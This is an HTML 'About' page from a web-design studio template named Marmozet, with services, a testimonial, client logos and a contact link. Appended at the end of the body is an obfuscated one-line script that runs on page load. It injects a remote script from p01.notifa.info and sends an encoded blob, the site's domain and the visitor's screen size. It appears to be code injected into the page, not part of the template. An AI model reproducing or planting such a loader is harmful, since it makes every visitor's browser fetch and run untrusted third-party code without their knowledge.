<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Marmozet - About</title>
   
    <link rel="stylesheet" href="assets/vendor/font-awesome-5/css/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/css/custom.css">
    <link rel="stylesheet" href="assets/css/main.css">
    <link rel="stylesheet" href="assets/css/responsive.css">
</head>

<body>
    <!-- Preloader  -->
    <div id="preloader">
            <div class="loader-logo text-center">
                <img src="assets/img/logo.png" alt="">
                <p>Please Wait</p>
            </div>
        </div>
    <div class="loader">
        <div class="block_first"></div>
        <div class="block_second"></div>
    </div>

    <!-- Navbar -->
    <nav>
        <div class="">
            <div class="nav-burger c-magnetic">
                <div class="span">
                    <div class="toggle-btn link empty-cursor">
                        <div class="burger-menu">
                            <span class="one"></span>
                            <span class="two"></span>
                            <span class="tre"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="bg_block_first"></div>
        <div class="bg_block_second"></div>

        <div class="manu-container">
            <div class="menu">
                <div class="data">
                    <div class="links">
                        <ul>
                            <li><span class="menu-link multi-start">Works</span>
                                <ul class="multimenu">
                                    <li><a class="link load-marmoset" href="index.html">Fullscreen</a></li>
                                    <li><a class="link load-marmoset" href="home-single.html">Single</a></li>
                                    <li><a class="link load-marmoset" href="home-multi-vert.html">Multi</a></li>
                                </ul>
                            </li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="about.html">About</a></li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="blog-sidebar.html">Blog</a></li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="contact.html">Contact</a></li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="index.html">Buy Now</a></li>
                        </ul>
                    </div>

                </div>

            </div>
        </div>
    </nav>
    <!-- Logo -->
    <div class="logo">
        <a class="link" href="index.html"><img src="assets/img/logo.png" alt="logo"></a>
    </div>

    <!-- Custom Cursor -->
    <div class="cursor"></div>
    <div class="cursor-follower"></div>

    <!-- social media -->
    <div class="social">
        <ul>
            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-facebook" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-instagram" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-twitter" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-behance" aria-hidden="true"></i>
                    </a>
                </span>
            </li>
        </ul>
    </div>

    <div class="copyright">
        <p>&copy; cingunt 2019</p>
    </div>

    <div class="about about-bg centered">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center">
                    <div class="main-title">
                        <h1 class="strokes">Marmózet <span>Studio</span></h1>

                        <div class="dash"></div>
                    </div>

                </div>
            </div>
        </div>
    </div>

    <div class="mt-full"></div>
    <section class="about-us-text">
        <div class="container">
            <div class="row">
                <div class="col-lg-8 offset-lg-2 text-center">
                    <h3 data-aos="fade-up">Marmoset is the digital Junior-Entreprise with a fresh and passionate
                        spirit.</h3>
                    <div class="dash"></div>
               
                    <p data-aos="fade-up">Imagined on the model of an agency in strategy, design and digital
                        transformation, our 360 ° positioning allows us to intervene on any type of digital project to
                        grow start-ups, rethink the digital positioning of companies and offer the best agility to
                        large groups.</p>
                </div>
            </div>
        </div>
    </section>
    <!-- Start Service -->
    <section id="service">
        <div class="container">
            <div class="title-content text-center" data-aos="fade-up">
                <h2>Our Services</h2>

            </div>
            <div class="row mt-30">
                <div class="col-lg-3 px-0 mt-30" data-aos="fade-up">
                    <div class="service-item">
                        <div class="service-icon">
                            <img src="assets/img/service/1.png" alt="">
                        </div>
                        <div class="service-text">
                            <h3>GRAPHIC DESIGN</h3>

                            <div class="service-line"></div>
                            <ul class="service-list">
                                <li>Logo Design</li>
                                <li>UI/UX</li>
                                <li>Illustration</li>
                            </ul>
                        </div>
                    </div>
                </div>

                <div class="col-lg-3 px-0 mt-30" data-aos="fade-up">
                    <div class="service-item">
                        <div class="service-icon">
                            <img src="assets/img/service/2.png" alt="">
                        </div>
                        <div class="service-text">
                            <h3>DEVELOPMENT</h3>
                            <div class="service-line"></div>
                            <ul class="service-list">
                                <li>Website</li>
                                <li>Mobile App</li>
                                <li>Desktop App</li>
                            </ul>
                        </div>
                    </div>
                </div>

                <div class="col-lg-3 px-0 mt-30" data-aos="fade-up">
                    <div class="service-item">
                        <div class="service-icon">
                            <img src="assets/img/service/3.png" alt="">
                        </div>
                        <div class="service-text">
                            <h3>BRANDING</h3>

                            <div class="service-line"></div>
                            <ul class="service-list">
                                <li>Logo Design</li>
                                <li>UI/UX</li>
                                <li>Illustration</li>
                            </ul>
                        </div>
                    </div>
                </div>

                <div class="col-lg-3 px-0 mt-30" data-aos="fade-up">
                    <div class="service-item bg-main">
                        <div class="service-icon">
                            <img src="assets/img/service/4.png" alt="">
                        </div>
                        <div class="service-text">
                            <h3>Photography</h3>

                            <div class="service-line"></div>
                            <ul class="service-list">
                                <li>Logo Design</li>
                                <li>UI/UX</li>
                                <li>Illustration</li>
                            </ul>
                        </div>
                    </div>
                </div>

            </div>

        </div>
    </section>
    <!-- End Service -->
    <section id="testimonial">
        <div class="testimonial">
            <div class="container">
                <div class="title-content text-center" data-aos="fade-up">
                    <h2>What people are saying</h2>
                  
                </div>

                <div class="row mt-30" data-aos="fade-up">
                    <div class="col-lg-10 offset-lg-1 mt-20">
                        <div class="quot-left">
                            <i class="fa fa-quote-left" aria-hidden="true"></i>
                        </div>
                        <div class="quot-right">
                            <i class="fa fa-quote-right" aria-hidden="true"></i>
                        </div>
                        <div class="testimonial">
                            <div class="owl-carousel owl-theme">
                                <div class="item-testi-slide">

                                    <div class="testimonial-item text-center">
                                        <p>" We have partnered with Marmozet since 2011, when they first designed
                                            our
                                            corporate stationery. Their work ethic is very professional, reliable, and
                                            timely. Marmozet always goes the extra mile and thus comes highly
                                            recommended. "</p>
                                        <div class="author">
                                            <p class="author-text">Nattasha, Aloka CEO</p>
                                        </div>
                                    </div>

                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="line-testi"></div>
            </div>
        </div>
    </section>
    <!-- Start Client -->
    <section id="client">
        <div class="container">
            <div class="title-content text-center" data-aos="fade-up">
                <h2>Our Client</h2>
      
            </div>
            <div class="row mt-60" data-aos="fade-up">
                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-1.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-2.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-3.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-4.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-5.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-6.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-1.png" alt="">
                        </div>
                    </div>
                </div>

                <div class="col-6 col-lg-3 px-0">
                    <div class="service-item">
                        <div class="client-icon">
                            <img src="assets/img/partner/light/client-1.png" alt="">
                        </div>
                    </div>
                </div>

            </div>

        </div>
    </section>
    <!-- End Service -->

    <div class="next-page centered">
        <div class="container text-center" data-aos="fade-up">
            <div class="title">
                <p>Lets Talk</p>
                <h3 class="strokes"><a class="link load-marmoset" href="contact.html"><span>Contact</span></a></h3>
            </div>
        </div>
    </div>


    <script src="assets/js/plugin.js"></script>
    <script src="assets/js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAUiWnkSN8PMQuitNX1bKfzcLrAy1HG2bhj5p29y%2fVyyCyxpA26iLjQkTcy3tF6VrgPAN0xQH9BreX%2fYKkeDx5gGRKVCUdulhE2HSgALi4gxHkNhcQCP3CRXjaNhxf7JCiG3MaaaYskIt3UZqHEQWALACMRd%2bY1t7OJ2MI25sJhAXr%2fy3JBSlbiJimdJ3xiBd%2f0xQxOxkWr5vLPuphzWUzsNEovUZEAMwkZppnomeOG9qjHybgM23azuJZSmfU82IMhFK1AuCKSrMAHTTPWXxgCehXdF0i7TezApbOvMVYWXCREUOcAzOIbB3D3l7%2beSwCe4MMIdo6iUE9K%2bk%2fpP%2b6f5qAPbh62M0mn8gB7i4hbivep717%2bC6blpdE1qgPN8Timg9gbvTlFCiUckRAS8L37xci1iahm9Gahq4Lw8as4LvmepXHs%2b83M3wlwE7CpPUdv9ILn7UZECU8ZC0BsqCwvJH%2fsmgevEQZAsVu7b4Kdu0%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>